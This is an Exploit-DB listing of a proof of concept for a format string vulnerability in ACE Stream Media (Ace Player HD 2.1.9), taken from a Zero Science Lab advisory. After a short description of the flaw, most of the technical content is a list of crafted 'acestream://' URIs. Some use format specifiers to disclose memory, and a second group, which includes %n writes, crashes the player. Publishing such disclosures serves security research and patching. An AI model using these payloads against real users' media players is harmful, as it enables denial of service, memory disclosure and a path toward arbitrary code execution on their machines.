ACE Stream Media 2.1 - 'acestream://' Format String

EDB-ID:

30666

CVE:

N/A


Author:

LiquidWorm

Type:

local


Platform:

Multiple

Date:

2014-01-03


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED


ACE Stream Media 2.1 (acestream://) Format String Exploit PoC


Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)

Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
technology, BitTorrent protocol, which is acknowledged as the most
effective protocol to transfer/deliver 'heavy content'.

Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input thru the URI using the 'acestream://'
protocol before including it in the format-specifier argument of
a formatted-printing function. A remote attacker may exploit this
issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.


Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php


30.12.2013

--


format md:

acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s

crashes:

acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA